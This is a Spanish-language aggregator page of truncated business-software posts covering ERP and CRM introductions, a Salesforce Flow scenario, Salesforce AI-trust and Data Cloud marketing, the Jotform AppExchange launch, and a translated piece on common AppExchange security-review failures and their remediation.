Introducción Un portal de proveedores es una plataforma en línea que permite a las empresas gestionar y optimizar sus procesos de adquisición y comunicación con los proveedores. Proporciona una interfaz centralizada donde los proveedores pueden enviar cotizaciones, realizar seguimiento de pedidos, enviar facturas y comunicarse con la empresa de manera eficiente. Los beneficios de utilizar […]
Introducción: ¿Qué es un CRM y por qué es importante para tu empresa? Un CRM, o Customer Relationship Management, es un sistema que permite a las empresas gestionar de manera eficiente las relaciones con sus clientes. Es una herramienta que ayuda a organizar y automatizar las actividades relacionadas con la gestión de clientes y ventas, […]
Introducción: Oracle ERP Cloud es una solución de gestión empresarial en la nube que ofrece una amplia gama de herramientas para mejorar la eficiencia y la productividad de tu negocio. En este artículo, te explicaremos qué es Oracle ERP Cloud, cómo funciona y cómo puede ayudarte a gestionar mejor tu empresa. 1. ¿Qué es Oracle […]
Introducción a Oracle ERP: ¿Qué es y cómo funciona? Oracle ERP es un sistema de planificación de recursos empresariales que ayuda a las empresas a gestionar y controlar sus procesos empresariales de manera eficiente. Este sistema integra diferentes áreas de la empresa, como finanzas, recursos humanos, ventas, compras, inventario, producción, entre otros, en una sola […]
Introducción: Oracle ERP Cloud es una solución de gestión empresarial que ofrece una amplia gama de herramientas para mejorar la eficiencia y la productividad de tu empresa. En este artículo, te explicaremos qué es Oracle ERP Cloud, cómo funciona y cómo puede ayudar a tu empresa a mejorar su gestión financiera, de recursos humanos, de […]
La gestión de proyectos es una disciplina que se encarga de planificar, organizar, dirigir y controlar los recursos y actividades necesarios para alcanzar los objetivos de un proyecto. Es una práctica fundamental en cualquier tipo de proyecto, ya sea en el ámbito empresarial, de construcción, tecnológico, entre otros. La gestión de proyectos es esencial para […]
Introducción Un sistema ERP (Enterprise Resource Planning) es una herramienta de gestión empresarial que integra y automatiza los procesos y operaciones de una empresa en un solo sistema. Estos sistemas son fundamentales para las empresas, ya que les permiten mejorar la eficiencia, la productividad y la toma de decisiones, al proporcionar una visión completa y […]
Introducción En el mundo empresarial actual, la gestión eficiente de los procesos y la toma de decisiones estratégicas son fundamentales para el éxito de una empresa. Para lograrlo, es necesario contar con herramientas tecnológicas que faciliten estas tareas. Una de estas herramientas es el software ERP (Enterprise Resource Planning, por sus siglas en inglés), que […]
Introducción En el mundo empresarial actual, la eficiencia y la optimización de los procesos son fundamentales para el éxito de una empresa. Una forma de lograr esto es a través de la implementación de un sistema ERP (Enterprise Resource Planning, por sus siglas en inglés). Odoo Open ERP es una de las opciones más populares […]
Última actualización el 7 de septiembre de 2023 por Rakesh Gupta Como nuevo Salesforce Certified AI Associate, comparto mis experiencias de estudio contigo y quiero que seas el próximo en superarlo Así que, ¡prepárese y sumérjase! 👉 Ya que estás aquí, es posible que desees
El post Cómo aprobar el examen de certificación Salesforce Certified AI Associate appeared first on Campeón de la Automatización.
Cómo aprobar el examen de certificación Salesforce Certified AI Associate appeared first on Campeón de la Automatización
Última actualización el 24 de octubre de 2023 por Rakesh Gupta Big Idea or Enduring Question: ¿Cómo se registran los correos electrónicos enviados con la acción ‘enviar correo electrónico’? Objetivos: Después de leer este blog, serás capaz de: Utilizar el flujo activado por registro para enviar una alerta por correo electrónico. Utilizar la acción de flujo «Enviar correo electrónico». Utilizar
The post Enviar, registrar, repetir: registro de alertas de correo electrónico como actividades appeared first on Campeón de la Automatización.
Las alertas de correo electrónico se envían por correo electrónico
«¿Cuál cree que es la diferencia entre un buen y un gran arquitecto de Salesforce?» Hace años, compartía un taxi después de Dreamforce con un amigo arquitecto de Salesforce y serpenteábamos entre el tráfico atascado en el centro de San Francisco. Surgió el tema de por qué muchos aspirantes a arquitectos fracasan en su primer intento en los exámenes de CTA. Pues bien, […]
El post Arquitectos de Salesforce: From Good to Great With Design Thinking appeared first on Salesforce Ben.
Los arquitectos de Salesforce: De buenos a excelentes con Design Thinking
Los talleres Well-Architected defienden los principios de «buena arquitectura» de Salesforce, pero lo más importante es que los participantes trabajan en grupos para debatir y proponer soluciones que apliquen estos principios a escenarios empresariales. La iniciativa y los talleres Well-Architected fueron creados por el equipo Salesforce Architect Relations. Recientemente asistí a uno impartido por Gaurav Kheterpal, un arquitecto empresarial de múltiples nubes (con muchos galardones), […]
El post Talleres bien diseñados: Build Your Salesforce Architect Mindset appeared first on Salesforce Ben.
Talleres bien diseñados: Construya su mentalidad de arquitecto de Salesforce
La gestión de múltiples instancias de Salesforce es un escenario que podría enfrentar una empresa en crecimiento. Aquí, cada instancia de Salesforce contiene datos y procesos comerciales cruciales que pueden requerir consolidación. La situación más común en la que se requiere consolidación es el resultado de fusiones y adquisiciones. Aparte de las fusiones, las organizaciones pueden adoptar Salesforce en distintas etapas de crecimiento […]
La publicación Planificación de una fusión de organizaciones de Salesforce: los tres riesgos principales que se deben evitar apareció por primera vez en Salesforce Ben .
8256706222173 administradores, arquitectos, analistas de negocios, consultores
La inteligencia es por lo general vista como la habilidad para pensar y aprender, pero en un mundo rápidamente cambiante puede importar mas aquello que podamos repensar y desaprender. El psicólogo empresaria Adam Grant es un experto en abrir las mentes de otras personas y la propia. En el siguiente articulo basado en el libro […]
¿Qué hacen concretamente los mejores equipos, y qué hacen los responsables de dichos equipos para precisamente liderar y conseguir sostener esos altos niveles de rendimiento? Daniel Coyle, autor del libro The Culture Code, es uno de esos expertos, investigadores, asesores y divulgadores que acierta especialmente en la forma de concebir un modelo de trabajo. Daniel […]
`The Power of When” apunta a enseñarte cuando es el mejor momento para ti de hacer algo, ya sea que estés tomando el café de la mañana, dándote una ducha o comiendo tu almuerzo. No hagas el error: Michael Breus no es ni físico ni mago; es un psicólogo con especialidad en desórdenes del sueño. […]
¿Recuerdas a la persona que Leonardo Dicaprio interpretó en la película de Hollywood The Wolf of Wall Street’? Aquel que ayudaba a miles de jóvenes niños a convertirse en hombres de ventas mundiales? En Way of the Wolf, revela lo que se trata su sistema de entrenamiento mágico The Straight Line, y cómo puede brindarte […]
Escenario de activación de registro 2
Su organización administra cuentas, contactos y oportunidades para operaciones de ventas. Desea automatizar el proceso de notificación al propietario de la cuenta cuando el campo personalizado 'Cambio de estado' de un contacto cambia a 'Inactivo'. Además, desea actualizar la 'Etapa de oportunidad' de todas las oportunidades relacionadas a 'En espera' cuando cambie el estado de este contacto. Explique cómo diseñaría un Flujo para lograr esto.
Respuesta
Centrémonos en el patrón para resolver este escenario de modo que podamos resolver preguntas de flujo de manera efectiva.
1. Comprenda el requisito:
– Punto de activación: cuando el 'Cambio de estado' de un contacto cambia a 'Inactivo'.
– Resultado: Automatizar la notificación al propietario de la cuenta y actualizar las etapas de la oportunidad.
2. Desglosarlo:
– Recuperación de datos: Identificar la Cuenta del Contacto y las Oportunidades relacionadas.
– Notificaciones: envía una notificación al propietario de la cuenta.
– Actualización: actualice las etapas de la oportunidad según el cambio de estado del contacto.
3. Visualice el flujo:
– Secuencia:
– Iniciar el flujo cuando el 'Estado' de un contacto cambie a 'Inactivo'.
– Recuperar la cuenta del contacto y las oportunidades relacionadas.
– Enviar una notificación al propietario de la cuenta.
– Actualizar la 'Etapa de Oportunidad' en Oportunidades relacionadas.
4. Diseñe el flujo:
– Elementos:
– “Registrar flujo activado” para iniciar el cambio de estado de flujo en contacto. Seleccionaremos cuándo se actualiza el registro, ya que el flujo debe ejecutarse cuando el campo 'cambio de estado' del contacto se cambia a inactivo.
– El “Elemento de decisión” comprueba si el campo de estado del caso está activo o no
– Elemento “Obtener registros” para recuperar la cuenta del contacto. Para este filtro se debe buscar la cuenta que tenga el mismo ID que el ID de cuenta del contacto.
– Enviar notificación por correo electrónico al propietario de la cuenta.
—
Escribe el correo electrónico. A la hora de redactar el contenido de tu correo electrónico, tienes tres opciones disponibles:
Opción 1: a partir del lanzamiento Summer '23 de Salesforce, puede utilizar plantillas de correo electrónico con la acción Enviar correo electrónico. Puede hacer esto activando el ID de plantilla de correo electrónico e ingresando el ID de la plantilla de correo electrónico que desea usar. Para encontrar esta ID, navegue hasta su plantilla de correo electrónico desde las Plantillas de correo electrónico Lightning en sus aplicaciones o la página Plantilla de correo electrónico clásica en la configuración. Luego copie la cadena de 15 caracteres de la URL y péguela en su flujo como ID de plantilla de correo electrónico.
Opción 2: almacena el cuerpo de tu correo electrónico en una plantilla de texto . Para hacer esto, active el interruptor Cuerpo . A continuación, seleccione Nuevo recurso en el menú y elija Plantilla de texto . Asigne a la plantilla un nombre API y escriba el cuerpo de su correo electrónico . Puede ingresar recursos personalizados desde el menú encima del cuadro de texto. De esta manera, puedes incluir tanto texto estático como información personalizada para el cliente potencial. Una vez que su plantilla esté completa, haga clic en Listo . 
A continuación, active Cuerpo con formato de texto enriquecido. En el menú desplegable, seleccione {!$GlobalConstant.True}. Esto garantiza que el formato de nuestro correo electrónico siga siendo consistente.
Por último, cambie el valor de Asunto a Activado y escriba su asunto en el cuadro. Puede omitir este paso si está utilizando una ID de plantilla de correo electrónico.
– Elemento “Actualizar Registros” para actualizar Etapas de Oportunidad.
5. Escenario de prueba:
– Cambie el 'Cambio de estado' de un contacto a 'Inactivo' y verifique que el flujo notifique correctamente al propietario de la cuenta y actualice las Etapas de la oportunidad a 'En espera'.
Producción
En una era dominada por la IA, la importancia de la confianza ha alcanzado nuevas alturas. A medida que los líderes de la industria navegan a través de la disrupción y la innovación, establecer y fomentar la confianza con los empleados y clientes es más que una necesidad. Es un imperativo estratégico.
La IA generativa tiene el potencial de aportar hasta 4,4 billones de dólares anuales a la economía mundial. Esto muestra el impacto monumental que la IA puede tener en varios sectores. Y la IA tiene la capacidad de automatizar el 40% de la jornada laboral promedio . Teniendo esto en cuenta, no podemos subestimar la influencia de la IA en la optimización de los procesos y la eficiencia. Es hora de reconocer el poder que tiene la IA confiable para mejorar la experiencia del cliente. Esto, a su vez, enfatiza la importancia de generar y mantener la confianza.
Cubriremos cómo podemos utilizar el papel esencial de la confianza en la adopción de plataformas de IA . También exploraremos cómo los beneficios de la IA pueden generar (y fortalecer) la confianza de los clientes.
Los servicios profesionales de Salesforce pueden ayudarle a establecer las bases adecuadas para el éxito con nuestro nuevo paquete, AI Coach.
Vivimos en un mundo donde tanto las empresas como los clientes cuestionan la confiabilidad de la IA . Esto es especialmente cierto cuando a la IA se le confía el activo más sensible: los datos de los clientes. De hecho, el 78% de los clientes dicen que cambiarían de proveedor de servicios financieros si sintieran que sus datos fueron mal manejados. Para las empresas, esto resalta la importancia crítica de salvaguardar la información de los clientes.
Pero ¿y si le dijéramos que la IA no tiene por qué ser un obstáculo para la confianza? ¿Que en realidad puede ser el puente que conecte a las empresas y sus clientes sobre una base de IA confiable? Sí, lo leiste bien. La adopción de la IA ha aumentado un 88 % entre 2020 y 2022, lo que demuestra el creciente reconocimiento del potencial de una IA confiable para crear impactos positivos y al mismo tiempo mantener la confianza.
Antes de profundizar en las formas en que la IA puede moldear la confianza, analicemos los cuatro pilares esenciales sobre los que se construye la confianza. Estos pilares desempeñan un papel vital a la hora de establecer una base de IA confiable en la que los clientes puedan confiar.
Ahora que entendemos los cuatro pilares de la confianza, vamos a aprovecharlos y ver cómo podemos fomentar la confianza con la IA. ¿Cómo podemos tomar la IA, que a menudo se considera un disruptor, y convertirla en el aliado que refuerza la confianza y la lealtad ? Exploremos algunos escenarios.
Los servicios profesionales de Salesforce pueden ayudarle a elevar sus capacidades para obtener el máximo valor de su
Inversión en Salesforce.
Al integrar estos pilares en su estrategia de IA, abordará las preocupaciones sobre la confianza y podrá posicionar la IA como un catalizador para la creación de confianza.
A medida que la IA continúa transformando las industrias, no podemos exagerar la importancia de la confianza. En Salesforce Professional Services , reconocemos que la confianza es primordial en el mundo de la IA confiable. Nuestro equipo dedicado está listo para guiarlo a través de este panorama transformador.
Salesforce Professional Services ofrece una oportunidad única a las organizaciones que inician su viaje hacia la IA. Adopte AI Coach y aproveche nuestra experiencia para maximizar el potencial de la IA. Trabajamos con usted para escalar y personalizar las experiencias de los clientes alineándonos con los resultados comerciales, construyendo un camino hacia el valor comercial, preparándonos para la entrega inmediata y estableciendo una hoja de ruta para el estado futuro que esté alineada con su visión y objetivos.
Con un historial de implementaciones exitosas de IA y un compromiso con las prácticas éticas, ofrecemos experiencia que va más allá de la tecnología: es una asociación basada en la confianza.
Mark Wakelin , vicepresidente ejecutivo de servicios profesionales globales
Ejecutivo senior con experiencia como director ejecutivo y director de éxito de la plataforma Salesforce, gestionando organizaciones con más de 10 000 empleados y ventas superiores a los 3 mil millones de dólares. Más de 30 años de experiencia en ERP, Front-Office, computación en la nube, SaaS e IA generativa, impulsando la innovación y el valor empresarial. Enfocados en la diversidad, la inclusión y la igualdad en el lugar de trabajo, con un compromiso con la filantropía. Aproveche su profunda experiencia financiera y técnica para lograr el éxito.
Temas cubiertos en la entrevista de Salesforce Service Cloud: Conocimientos generales y características Gestión de casos Soluciones y base de conocimientos Consola de servicio Portales/comunidades de clientes y agentes Flujo de trabajo y automatización: Informes y paneles en Service Cloud Integración de CTI y telefonía Servicio al cliente en redes sociales Chat y mensajería Integración […]
Última actualización el 8 de septiembre de 2023 por Rakesh Gupta
Salesforce es la solución CRM basada en ventas, marketing y operaciones más sólida y completa disponible. Los límites de lo que puede hacer con los datos de sus clientes (una vez que están en Salesforce) están limitados únicamente por su imaginación y habilidad para navegar por el ecosistema.
Pero no hay dos organizaciones iguales. Cada uno tiene sus propias necesidades, desde simples hasta complejas, desde la captura de clientes potenciales hasta la coordinación de eventos. Y la forma en que ingresa sus datos en Salesforce (tipo de integración, creación de objetos, coincidencia de campos, llenado previo, etc.) puede marcar la diferencia en cuanto a si sus flujos de trabajo de CRM realmente automatizan su trabajo pesado y le ahorran tiempo valioso o lo atascan con tareas manuales.
Es un motivo de orgullo para nosotros que miles de organizaciones sin fines de lucro, proveedores de servicios, empresas de atención médica y más hayan confiado en Jotform para canalizar los datos de sus clientes a Salesforce a lo largo de los años.
Jotform ahora está disponible en AppExchange de Salesforce para una experiencia de creación de formularios completamente nueva e intuitiva.
Con Jotform en Salesforce AppExchange, sus flujos de trabajo experimentarán una verdadera automatización de extremo a extremo, lo que ayudará a su organización a lograr sus objetivos más rápido.
He aquí por qué le encantará Jotform para Salesforce:
Si usted es una organización sin fines de lucro que digitaliza aplicaciones de quienes las necesitan, un B2B que recopila clientes potenciales y activos de video, un proveedor de atención médica que registra información de pedidos y facturas de consultorios médicos, o una empresa líder con más de 50,000 clientes, Jotform para Salesforce está diseñado para escale con sus necesidades.
Insinuamos que industrias como las organizaciones sin fines de lucro y la atención médica son grandes usuarios de la integración heredada de Salesforce de Jotform. Pero realmente cualquier persona en cualquier industria que ya use Salesforce debería usar esta versión mejorada de la integración.
Además de sincronizar contactos y clientes potenciales estándar , a continuación se muestran algunos casos de uso de muestra.
| Industria | Usos de Jotform y Salesforce |
|---|---|
| Sin ánimo de lucro | Las organizaciones sin fines de lucro pueden sincronizar donaciones, solicitudes, registros de programas y material adicional de eventos que recopilan a través de Jotform con Salesforce. También pueden utilizar las aplicaciones de donación de Jotform y las automatizaciones del flujo de trabajo de aprobación dentro de Salesforce. |
| Cuidado de la salud | Tanto los profesionales de la salud como los proveedores utilizan Jotform para crear facturas y formularios de citas compatibles con HIPAA. Pueden sincronizar datos de contactos relacionados con objetos personalizados en Salesforce. |
| Ventas | Un flujo de trabajo automatizado de Jotform y Salesforce para clientes potenciales es fundamental para cualquier equipo de ventas. Además, Ventas |
| Servicios financieros | Las empresas de servicios financieros utilizan ambas soluciones para calificar y gestionar la creación de préstamos y actualizar la información existente de los clientes, utilizando lógica condicional y formularios PDF inteligentes. |
| B2B/gestión de eventos | Las empresas orientadas a servicios asignan envíos de registro a objetos personalizados y registran comentarios de encuestas en Salesforce. |
| Consultores | Los usos aquí van desde la creación de formularios que pueden integrarse en un sitio web hasta soluciones de firma electrónica y el llenado previo de datos utilizando información de Salesforce. |
| Agencias y mesas comerciales | Estas empresas venden servicios, cobran pagos y solicitudes y luego mapean y rastrean a sus solicitantes en Salesforce. |
No solo todas sus automatizaciones de Jotform están disponibles dentro de su instancia de Salesforce, sino que una gran característica nueva de Jotform para Salesforce es el tipo de formulario único de Salesforce dentro de la aplicación.
Desde la página de inicio de Mis formularios , haga clic en el botón Crear formulario como lo haría normalmente. Ahora verá la opción Crear formulario de Salesforce , que le permite crear un formulario que se integra automáticamente con sus objetos de Salesforce.
Esta nueva opción es perfecta para asignar de manera eficiente sus campos de Salesforce a sus formularios. Permite una sincronización de campos más sencilla desde sus formularios con clientes potenciales, contactos, cuentas u otros objetos/registros personalizados, dejando atrás conexiones de integración complejas.
Simplemente seleccione los objetos que se adapten a sus necesidades y agréguelos a su nuevo formulario. Los objetos son básicamente mini bases de datos. Cada base de datos contiene campos relevantes para el objeto.
En este formulario de ejemplo de Salesforce, seleccioné tres objetos: Cliente potencial , Evento y Adjunto . No hay límite para la cantidad de objetos que puede seleccionar para satisfacer sus necesidades de datos.
Una vez que haya seleccionado todos sus objetos (y haya verificado los campos dentro de ellos para obtener los datos que desea en su formulario), haga clic en Crear formulario . Su nuevo formulario mostrará todos los campos que ha seleccionado.
Por ejemplo, cuando alguien envía mi nuevo formulario de cliente potencial, sus detalles completarán automáticamente los objetos en mi base de datos de Salesforce.
¿Necesita actualizar o editar su formulario? Utilice el nuevo ícono de Salesforce dentro del creador de formularios para actualizar sus objetos. Puede cambiar o agregar campos dentro de sus objetos existentes o agregar otros nuevos.
Cuando haga clic en Siguiente , tendrá la opción de activar Actualizar registro para evitar duplicados en su base de datos.
También puede hacer clic en el botón Agregar acción para crear un nuevo registro, actualizar uno existente o buscar un registro existente.
Si bien otras soluciones de AppExchange pueden ayudarlo a importar datos a Salesforce, creemos que la calidad y el alcance de nuestras automatizaciones de flujo de trabajo marcan la diferencia.
Por ejemplo, ahora es fácil completar previamente sus formularios de forma segura dentro de la interfaz de Salesforce.
Simplemente vaya a la pestaña Publicar , acceda a Precompletar desde el menú de la izquierda, elija Salesforce Precompletar y cargue la información de contacto y cliente potencial que necesita en sus formularios. Como ya está en Salesforce, no es necesaria ninguna autenticación de cuenta.
Se ha demostrado que rellenar previamente formularios ofrece mayores tasas de conversión de formularios y una mayor precisión de los clientes potenciales (además de actualizar sus contactos de Salesforce o los detalles de su empresa con nueva información).
Para profundizar más,obtenga más información sobre cómo completar previamente formularios con sus objetos de Salesforce.
Si está cobrando pagos, puede agregar una de las más de 40 integraciones de pagos a sus formularios de Salesforce. Personalice los campos en sus objetos para indicar si se ha cobrado una tarifa al enviar el formulario o registre el monto pagado en los campos de su objeto.
Cree un acuerdo de Jotform Sign dentro de Salesforce que se configure automáticamente para la aprobación de las partes interesadas internas. Recopilará documentos firmados que mantendrán el trabajo en movimiento y la productividad en sus niveles más altos.
Estas y otras automatizaciones basadas en formularios, como la generación de PDF, Jotform Approvals, Jotform Apps y Report Builder, junto con los nuevos formularios de Salesforce, continúan optimizando sus flujos de trabajo mientras se adaptan a sus necesidades únicas de Salesforce de maneras innovadoras.
Si trabaja para una organización empresarial que utiliza Salesforce como CRM, obtenga más información sobre Jotform Enterprise en Salesforce AppExchange .
¿Nuevo en Salesforce? Esta potente solución puede ayudar a su organización a gestionar los procesos y la participación de los clientes de muchas maneras, pero empezar puede resultar desalentador.
A continuación se ofrecen algunos consejos útiles que debe tener en cuenta si recién está comenzando:
Jotform para Salesforce mejora su experiencia ofreciendo
Si ya es cliente pago de Jotform con una integración de Salesforce, podrá instalar Jotform en AppExchange y comenzar a usarlo ahora (los consultores son una excepción).
Para aquellos con un plan Jotform Starter, pueden disfrutar de hasta cinco formularios y 100 envíos mensuales por nuestra cuenta; sin embargo, deberá actualizar a un plan pago si desea aumentar el uso, el espacio de almacenamiento o la cantidad de usuarios.
Si sus necesidades exceden lo disponible con el plan Starter, puede unirse a cualquiera de los siguientes planes para un solo usuario:
Las organizaciones sin fines de lucro califican automáticamente para descuentos. Y para aquellos que requieren acceso a toda la empresa o un enfoque personalizado, Jotform ofrece soluciones empresariales; Hable con alguien hoy para obtener más información.
Pruebe Jotform para Salesforce hoy y díganos cómo se siente al respecto. Además, no dude en comentarnos en AppExchange.
¡Quiero saber de ti!
¿Qué es lo que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntete libre de compartir en los comentarios a continuación.
Última actualización el 2 de octubre de 2023 por Rakesh Gupta
Los datos no son sólo un buen extra; es esencial. Especialmente ahora, cuando las empresas operan en gran medida en espacios digitales, la necesidad de un buen uso de los datos es clara. El papel del análisis de datos se ha vuelto crucial para impulsar el éxito de una empresa. Es importante que los líderes de las empresas tengan un plan de datos sólido, uno que permita que sus negocios avancen rápidamente y enfrenten desafíos difíciles.
Los equipos se benefician enormemente de un análisis de datos sólido. Pueden tomar decisiones inteligentes más rápido que antes y también con mayor precisión. Este tipo de uso de datos también ayuda a los equipos a trabajar mejor juntos al eliminar cosas que obstaculizan un buen trabajo en equipo. Los líderes de TI tienen un papel especial aquí. Tienen las habilidades para hacer que los datos sean útiles de nuevas maneras, transformando el trabajo de los equipos y mejorando la experiencia de los clientes.
Salesforce Data Cloud está diseñada para cambiar la forma en que las empresas interactúan con los clientes. Es bueno para recopilar datos de diferentes lugares. Estos datos van a una gran área de almacenamiento llamada lago de datos. Luego utiliza un análisis preciso para explicar lo que significan los datos.
Salesforce Data Cloud ayuda a vincular varias fuentes y nubes más rápidamente en toda la plataforma. Sin embargo, Data Cloud también es un artículo que se puede pedir. Aunque no todos los clientes de Salesforce han comprado Data Cloud, aunque se encuentran en el punto de partida, todavía utilizan Data Cloud hasta cierto nivel. Sin embargo, todo esto se fortalece cuando se utiliza la Nube de Datos como plataforma de personalización y unificación de datos.
Imagínese cómo el volumen de datos crece rápidamente cuando piensa en la cantidad de clics que hace cada cliente. Puede realizar un seguimiento de dichos datos de participación a medida que ocurren, por ejemplo, cuando los usuarios abren y hacen clic en correos electrónicos, exploran páginas en sus aplicaciones móviles y miran artículos en su tienda en línea. Es mucho más probable que las personas hagan clic cuando les envías un correo electrónico o una oferta que les resulta útil. Puede capturar la interacción cuando un consumidor hace clic en Data Cloud. Cuando sepa qué les interesa y si es probable que compren algo o no, podrá aprovechar esta información a su favor.
Para cada sector o puesto, la Nube de Datos puede generar experiencias y oportunidades de negocio potentes.
Para analizar cuentas integradas y adquirir información rápida y fácilmente sobre sus clientes y los efectos comerciales, los analistas pueden conectar Data Cloud a Tableau o QlikView . Cuando una empresa puede identificar a sus consumidores en función de la cantidad y el tema de sus tickets de soporte, puede desarrollar y llevar a cabo un plan para reducir esos tickets. Verifique los datos nuevamente para asegurarse de que el plan haya tenido éxito.
Los desarrolladores pueden crear software utilizando datos de Data Cloud, como un sistema de puntuación de salud que mide la puntuación de salud de un paciente utilizando objetos e información prediseñados. Cuando una actividad de datos inicia un flujo para enviar notificaciones a los médicos cuando una puntuación cae por debajo de un nivel específico, esa puntuación y su uso se convierten en una experiencia que salva vidas.
Según la probabilidad de conversión de un cliente, los vendedores pueden obtener información sobre sus clientes potenciales y sus ventas potenciales. Según los hábitos de navegación de los usuarios y los niveles actuales de oferta de productos, la gestión del comercio electrónico puede utilizar datos para personalizar su sitio web.
En pocas palabras, Data Cloud permite a los administradores de Salesforce realizar una variedad de acciones, que incluyen, entre otras:
Se puede utilizar una estructura similar a un lago de datos para describir Salesforce Data Cloud. Como ejemplo, recopilando todos los datos de la plataforma Salesforce. Sin embargo, también es capaz de importar datos de otras fuentes externas, como lagos de datos.
Perspectiva :
Un lago de datos es una ubicación concentrada para almacenar datos no procesados. Las empresas utilizan este sistema de almacenamiento enorme, adaptable y asequible para recopilar y guardar grandes cantidades de datos organizados, no estructurados y semiestructurados en su formato original. Las publicaciones en redes sociales, los registros de sensores y los datos de ubicación son solo algunos ejemplos de los datos no estructurados que recopilan los lagos de datos.
Lo que indica para los usuarios : las marcas son más capaces de predecir los requisitos y necesidades de los consumidores debido a la gran cantidad de información accesible en un lago de datos.
Cómo afecta a los equipos : Los equipos pueden acceder a enormes cantidades de datos en una ubicación, lo que les permite moverse más rápidamente y mantenerse al día con (o superar) a los oponentes.
Revise esta lista de verificación sugerida antes de comenzar a utilizar Data Cloud. Confirme que su equipo esté configurado antes de implementar Data Cloud, verifique estos puntos:
Salesforce Data Cloud es costoso. Es una inversión que requiere una planificación meticulosa porque comienza en $10 mil por organización, mensualmente. De manera realista, dependiendo de los valores de sus datos, es posible que su empresa ya necesite gastar más en Data Cloud. Como tus datos crecen constantemente, es importante tenerlo presente todo el tiempo, pero…
… En el último evento de Dreamforce, Salesforce anunció que las licencias gratuitas de Data Cloud ya están disponibles. Los clientes que tengan Enterprise Edition o superior ahora pueden acceder a Data Cloud sin costo alguno. En esta oferta se incluyen dos licencias de Tableau Creator, que permiten a las empresas conectar hasta 10 000 perfiles de clientes y comenzar sus exploraciones.
Los datos son más cruciales que nunca y supervisar el flujo de datos en constante crecimiento es un trabajo increíble. Sin embargo, los datos tienen una enorme influencia. El potencial de obtener conocimientos empresariales que puedan fundamentar decisiones y producir experiencias sorprendentes para los clientes crece a medida que aumenta el acceso a los datos y la alfabetización sobre datos para las personas de toda su empresa. La IA y el CRM se pueden utilizar para impulsar actividades inteligentes y proporcionar servicios personalizados a escala cuando se combinan con datos procesables en tiempo real.
Ahora, con Data Cloud y Einstein AI nativos en la plataforma Einstein 1, las empresas pueden crear fácilmente aplicaciones y flujos de trabajo impulsados por AI que potencian la productividad, reducen costos y brindan increíbles experiencias a los clientes. – Parker Harris, cofundador y director de tecnología, Salesforce
Los datos del cliente, el contenido empresarial, los datos de telemetría, los chats de Slack, los datos parcialmente estructurados y otros datos estructurados y no estructurados se fusionan y conectan mediante Data Cloud, la plataforma de datos a hiperescala de Salesforce que funciona en tiempo real, para generar un perfil único del cliente. La plataforma ya vincula e integra 100 mil millones de registros diariamente y procesa 30 billones de transacciones mensuales.
Las empresas ahora pueden crear perfiles de clientes completos y unificados, ofrecer nuevas experiencias de CRM y acceder a datos fragmentados de formas completamente nuevas gracias a la integración completa de la nueva Nube de Datos con la Plataforma Einstein 1.
¡Quiero saber de ti!
¿Qué es lo que aprendiste de esta publicación? ¿Cómo imagina aplicar este nuevo conocimiento en el mundo real? Siéntete libre de compartir en los comentarios a continuación.
Esta es una traducción que desde EGA Futura ofrecemos como cortesía a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoamérica .
El enlace a la publicación original, lo encontrarás al final de este artículo.
…
Se sabe que la revisión de seguridad de AppExchange es uno de los procesos de revisión más rigurosos de cualquier mercado de aplicaciones en línea. Esta estricta reputación es algo de lo que Salesforce se enorgullece, siendo la confianza nuestro valor número uno. Como mercado de software empresarial, tenemos la profunda responsabilidad de cumplir con los más altos estándares de seguridad posibles para la protección de los datos de los clientes.
Dicho esto, estos estándares pueden representar un desafío importante para los socios ISV que buscan publicar ofertas en AppExchange. Para ayudar a mejorar la transparencia y ayudarlos a todos a tener éxito, en orden de prevalencia, esta publicación analizará las 20 razones principales por las que los socios no pasan la revisión de seguridad (a partir de 2023). También cubriremos cómo remediar o prevenir estos problemas.
Las vulnerabilidades de aplicación de la seguridad a nivel de objetos y campos (CRUD/FLS) son la razón principal (por un margen significativo) para no pasar la revisión de seguridad de AppExchange. Estas vulnerabilidades representan fallas al verificar adecuadamente si los objetos y/o campos son accesibles, creables, eliminables y/o actualizables antes de ejecutar consultas o acciones de base de datos. Si su oferta de AppExchange contiene algún código de Salesforce, este problema debe ser su prioridad número uno a resolver antes de enviarlo para una revisión de seguridad.
Si, durante su proceso de codificación, no ha implementado consistentemente comprobaciones CRUD/FLS o no ha ejecutado SOQL, SOSL y DML en modo de usuario, querrá hacer una revisión muy exhaustiva de su código base para asegurarse de que no esté realizar cualquier operación de creación/lectura/actualización/eliminación no marcada en objetos o campos.
El método preferido y moderno para hacer cumplir CRUD/FLS implica utilizar el modo de usuario en todas las consultas y operaciones de bases de datos. La desventaja de esto es que Checkmarx, PMD y el motor de reglas PMD de Code Analyzer aún no lo admiten completamente (al momento de escribir esta publicación, PMD admite WITH USER_MODE en SOSL/SOQL, pero no el modo de usuario DML, por lo que si usa este tipo de protección arrojará falsos positivos). Code Analyzer Graph Engine es actualmente la única herramienta que admite ambos tipos de modos de usuario. Consulte el comando scanner:run:dfa en la documentación para ejecutar un escaneo con Code Analyzer Graph Engine.
Si ha estado aplicando CRUD/FLS a la antigua usanza con Schema.DescribeSObjectResult (es decir, métodos como isCreatable() , isUpdateable() , isDeletable() ), entonces Code Analyzer y la extensión PMD para VS Code pueden ser útiles herramientas que puede utilizar para comprobar su código base. Puede seguir nuestra guía para obtener más información sobre cómo utilizar PMD para VS Code y Code Analyzer para eliminar las infracciones CRUD/FLS.
El escáner Checkmarx debe utilizarse como verificación final de violaciones de CRUD/FLS. Puede ejecutar este análisis a través del Portal de seguridad para socios .
Obtenga más información sobre la aplicación de CRUD/FLS en Trailhead .
Esto significa que alguna pieza de software (normalmente, una versión específica del software) utilizada en su oferta tiene vulnerabilidades de seguridad conocidas. La mayoría de las veces, es porque estás usando una versión desactualizada de una biblioteca de JavaScript (por ejemplo, jQuery es, con diferencia, la más común), pero también podría ser algo así como versiones antiguas de nginx, bibliotecas de Python, CKEditor o PHP.
Intente identificar todas las bibliotecas, marcos, software y otras tecnologías que no sean de Salesforce dentro del alcance de su oferta de AppExchange.
Busque cada uno de estos en Snyk (para proyectos de código abierto) o en la base de datos CVE . CVE significa "vulnerabilidades y exposiciones comunes" y la base de datos CVE representa un glosario de vulnerabilidades de seguridad conocidas públicamente que es mantenido y operado por el FFRDC Nacional de Ciberseguridad de EE. UU. y MITRE Corporation. También puede utilizar el complemento RetireJS de Salesforce Code Analyzer para ejecutar un escaneo de su código base empaquetado para buscar bibliotecas de JavaScript con vulnerabilidades conocidas.
